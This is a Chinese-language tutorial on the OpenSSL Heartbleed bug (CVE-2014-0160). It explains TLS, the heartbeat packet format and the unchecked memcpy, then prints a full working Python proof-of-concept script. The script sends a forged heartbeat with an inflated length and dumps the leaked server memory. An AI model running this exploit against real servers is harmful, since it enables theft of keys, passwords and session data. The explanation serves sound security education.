概述

心脏出血漏洞是 OpenSSL 在实现 SSL/TLS 的心跳扩展时,由于代码缺陷导致的缓冲区过读漏洞。

OpenSSL 的心跳处理逻辑中,没有检验心跳请求包的长度字段和后续的数据字段是否相符合。 因此,攻击者可以通过构造请求包,获取服务器内存中的敏感信息(最多 64KB)。

要了解漏洞的原理,我们要弄清楚以下几个问题:

  • SSL/TLS 是什么?
  • 心跳扩展是怎么工作的?
  • OpenSSL 是怎么处理 TLS 心跳扩展的?
  • 怎么利用漏洞?

SSL/TLS 简介

SSL 和 TLS 都是用来加密传输数据的协议,而 TLS 是在 SSL3.0 基础上开发的新版本(可 以看作 SSL4.0)。两者使用的证书跟协议本身无关,而是取决于服务器的配置,一般服务 器都会使用“SSL/TLS 证书”兼容两种协议。

The differences between this protocol and SSL 3.0 are not dramatic, but they are significant enough that TLS 1.0 and SSL 3.0 do not interoperate. (Reference)

SSL/TLS 的工作过程:

  1. 客户端向服务器端索要公钥,并验证
  2. 双方协商生成“对话密钥”
  3. 双方采用“对话密钥”进行加密通信

简单来说,就是一个 用非对称加密来确定对称加密的密钥,再用该密钥进行加密传输 的过 程。前者也称为“握手阶段”(handshake)。

Heartbeat 扩展协议

在没有心跳扩展前,SSL/TLS 的双方不能一直保持连接,只要客户端在一段时间没有请求, 服务器就会中断连接并释放资源。当同一个客户端继续进行上次的连接,必须要与服务器重 新协商、建立连接,而重新协商连接消耗很大。心跳扩展则可以解决这个问题。 (Reference

在使用心跳扩展时,如果客户端一段时间内没有进行操作,就会自动发送一个心跳请求包。 客户端通过请求包发送一个固定长度的字符串,并事先告诉服务端这个字符串有多长。服务 端知道“长度”后,先在内存预留一个相应大小的缓冲区,再将字符串放到缓冲区中,最后 从内存读取这个字符串并通过心跳响应包返回给客户端。这样一来一回,服务端就知道这个 客户端还是“活的”,连接也就可以保持了。

心跳包字段长度说明
ContentType1byte心跳包类型,IANA 组织把 type 编号定义为 24(0x18)
ProtocolVersion2bytesTLS 的版本号,目前主要包括含有心跳扩展的 TLS 版本:TLSv1.0,TLSv1.1,TLSv1.2
length2bytesHeartbeatMessage 的长度
HeartbeatMessageType1byteHeartbeat 类型,01 表示 heartbeat_request,02 表示 heartbeat_response
payload_length2bytespayload 长度
payloadpayload_length*bytespayload 的具体内容
padding>=16bytespadding 填充,最少为 16 个字节

TLS 心跳包格式

漏洞成因

OpenSSL 收到心跳请求包后,并没有检查真正收到数据是不是像它所说的一样长。假如,请 求包说“我给你的是一个 30KB 的字符串”,但实际上这个字符串只有 10KB。OpenSSL 依然会 从内存中额外复制 20KB 的数据,并通过响应包返回给客户端。

心跳包最多可以发送 64KB 的数据,所以攻击者可以利用这个漏洞,获得服务器内存中的 64KB 数据。

导致该漏洞的一行代码

memcpy(bp, pl, payload);

memcpy() 的作用是复制数据, bp 是要复制到的地方, pl 是数据源, payload 是数据的 长度。这个函数的问题在于,没有检查 pl 中的数据的长度是不是和 payload 相等。

POC

  #!/usr/bin/python
  #-*- coding: utf-8 -*-
 
  # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
  # The author disclaims copyright to this source code.
 
  import sys
  import struct
  import socket
  import time
  import select
  import re
  from optparse import OptionParser
 
  options = OptionParser(usage='%prog server [options]',
                         description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
  options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
 
 
  def h2bin(x):
      return x.replace(' ', '').replace('\n', '').decode('hex')
 
 
  # ClientHello,提供协议版本、随机数、支持的加密和压缩算法等信息
  hello = h2bin('''
  16 03 02 00  dc 01 00 00 d8 03 02 53
  43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
  bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
  00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
  00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
  c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
  c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
  c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
  c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
  00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
  03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
  00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
  00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
  00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
  00 0f 00 01 01
  ''')
 
  # 心跳请求包,最后两个字节是长度,即16384(0x4000)
  hb = h2bin('''
  18 03 02 00 03
  01 40 00
  ''')
 
  # 解析内存的数据
  def hexdump(s):
      for b in xrange(0, len(s), 16):
          lin = [c for c in s[b: b + 16]]
          hxdat = ' '.join('%02X' % ord(c) for c in lin)
          pdat = ''.join((c if 32 <= ord(c) <= 126 else '.') for c in lin)
          print '  %04x: %-48s %s' % (b, hxdat, pdat)
      print
 
 
  def recvall(s, length, timeout=5):
      endtime = time.time() + timeout
      rdata = ''
      remain = length
      while remain > 0:
          rtime = endtime - time.time()  # 剩余时间
          if rtime < 0:
              return None
          r, w, e = select.select([s], [], [], 5)
          if s in r:
              data = s.recv(remain)
              # EOF?
              if not data:
                  return None
              rdata += data
              remain -= len(data)
      return rdata
 
 
  def recvmsg(s):
      hdr = recvall(s, 5)
      if hdr is None:
          print 'Unexpected EOF receiving record header - server closed connection'
          return None, None, None
      typ, ver, ln = struct.unpack('>BHH', hdr)
      pay = recvall(s, ln, 10)
      if pay is None:
          print 'Unexpected EOF receiving record payload - server closed connection'
          return None, None, None
      print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
      return typ, ver, pay
 
 
  def hit_hb(s):
      s.send(hb)
      while True:
          typ, ver, pay = recvmsg(s)
          if typ is None:
              print 'No heartbeat response received, server likely not vulnerable'
              return False
 
          if typ == 24:
              print 'Received heartbeat response:'
              hexdump(pay)
              if len(pay) > 3:
                  print 'WARNING: server returned more data than it should - server is vulnerable!'
              else:
                  print 'Server processed malformed heartbeat, but did not return any extra data.'
              return True
 
          if typ == 21:
              print 'Received alert:'
              hexdump(pay)
              print 'Server returned error, likely not vulnerable'
              return False
 
 
  def main():
      opts, args = options.parse_args()  # 解析参数(IP和端口)
      if len(args) < 1:
          options.print_help()
          return
 
      s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      print 'Connecting...'
      sys.stdout.flush()  # 刷新输出
      s.connect((args[0], opts.port))
      print 'Sending Client Hello...'
      sys.stdout.flush()
      s.send(hello)  # 发送ClientHello请求
      print 'Waiting for Server Hello...'
      sys.stdout.flush()
      while True:
          typ, ver, pay = recvmsg(s)
          if typ == None:
              print 'Server closed connection without sending Server Hello.'
              return
          # Look for server hello done message.
          if typ == 22 and ord(pay[0]) == 0x0E:
              break
 
      print 'Sending heartbeat request...'
      sys.stdout.flush()
      s.send(hb)  # 发送心跳包
      hit_hb(s)  # 检测心血漏洞
 
 
  if __name__ == '__main__':
      main()